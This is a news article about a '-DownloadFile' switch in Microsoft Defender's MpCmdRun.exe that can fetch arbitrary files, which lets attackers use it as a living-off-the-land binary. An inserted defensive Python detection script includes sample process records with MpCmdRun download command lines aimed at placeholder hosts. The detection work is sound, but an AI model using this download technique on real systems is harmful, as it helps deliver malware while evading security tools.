Windows 10: the antivirus that downloads viruses by mistake

By Miguel Moro Vallina (@miguelmorovallina)

A recent change in Microsoft Defender, the free antivirus that Microsoft distributes with the Windows 10 operating system, has a paradoxical side: it allows you to download viruses. Cybersecurity researcher Mohammad Askar discovered it: the antivirus can in fact be used to download any type of file from the Internet, including infected ones.

Askar found this new feature in Microsoft Defender versions 4.18.2007.9 and 4.18.2009.9 and tried using it to download a virus to his computer. The experiment succeeded: Defender downloaded the infected file Askar requested. The only reassuring thing in all of this is that Microsoft Defender itself finds the virus and blocks it on the first scan. Still, it is decidedly curious that Microsoft has built the ability to download files into the antivirus, and even more curious that these files can be infected. Previous versions of Defender had no such command and could not be used to download files.



How to download viruses with Microsoft Defender

Microsoft Defender includes the MpCmdRun.exe tool, which is used to run the antivirus from the command line. The novelty in the latest versions is the "-DownloadFile" command, which did not exist before and which can be used to download a specific file from a specific web address to a specific folder on your computer.

This is a boon for anyone who wants to download a virus onto a Windows PC, because Defender comes pre-installed with the operating system and cannot be removed, so it is found on every PC. Technically, therefore, Microsoft's own antivirus can be used by a hacker as a "LOLBIN", short for "living-off-the-land binary". The term refers to system files that are entirely legitimate and official, but that hackers can exploit for dangerous purposes.
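For defenders, the practical consequence is that a process-creation record showing MpCmdRun.exe with "-DownloadFile" deserves review. The following Python check is an added example, not code from the original article or from Microsoft; it runs over constructed records whose field names follow Sysmon Event ID 1, and the paths, host and tokens after the switch are placeholders. Matching the switch case-insensitively is an assumption.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation records. Field names follow Sysmon Event ID 1;
# paths, host and the tokens after -DownloadFile are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Defender\MpCmdRun.exe", "OriginalFileName": "MpCmdRun.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"C:\Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    {"Image": r"C:\Defender\MpCmdRun.exe", "OriginalFileName": "MpCmdRun.exe",
     "ParentImage": r"C:\Office\WINWORD.EXE",
     "CommandLine": r'"C:\Defender\MpCmdRun.exe" -DownloadFile SRC '
                    r'https://example.invalid/a.bin DST C:\Temp\a.bin'},
    {"Image": r"C:\Users\Public\upd.exe", "OriginalFileName": "MpCmdRun.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'upd.exe -downloadfile SRC http://example.invalid/b.bin'},
    {"Image": r"C:\Windows\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'notepad.exe "C:\notes\MpCmdRun -DownloadFile.txt"'},
]

# Assumption: the switch is matched case-insensitively.
SWITCH = re.compile(r"(?<![\w-])-DownloadFile(?![\w-])", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
TOOL = "mpcmdrun.exe"

def is_mpcmdrun(event):
    """True if the on-disk name or the embedded original name is MpCmdRun.exe."""
    names = (basename(event.get("Image", "")), event.get("OriginalFileName", ""))
    return any(name.lower() == TOOL for name in names)

def detect(events):
    """Return one finding per MpCmdRun.exe launch that carries -DownloadFile."""
    findings = []
    for event in events:
        cmd = event.get("CommandLine", "")
        if not (is_mpcmdrun(event) and SWITCH.search(cmd)):
            continue
        image = event.get("Image", "")
        findings.append({
            "image": image,
            "renamed": basename(image).lower() != TOOL,  # copied under another name
            "urls": URL.findall(cmd),
            "parent": basename(event.get("ParentImage", "")),
        })
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Checking `OriginalFileName` as well as the image name keeps the rule effective when the binary has been copied under a different name, and the parent process gives triage context.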



Is Microsoft Defender dangerous?

At this point we have to ask whether, and how much, Microsoft Defender can be dangerous. It must be said that the infected files Askar and other researchers downloaded for testing, when run on the same computer, were discovered by Defender on the next scan.


The question, however, is whether other antivirus products would recognize them as well, since it is often necessary to disable Defender for another antivirus to work without problems. In theory, it is also possible that files downloaded with Microsoft's antivirus contain new viruses, not yet known to either Defender or other antivirus products.

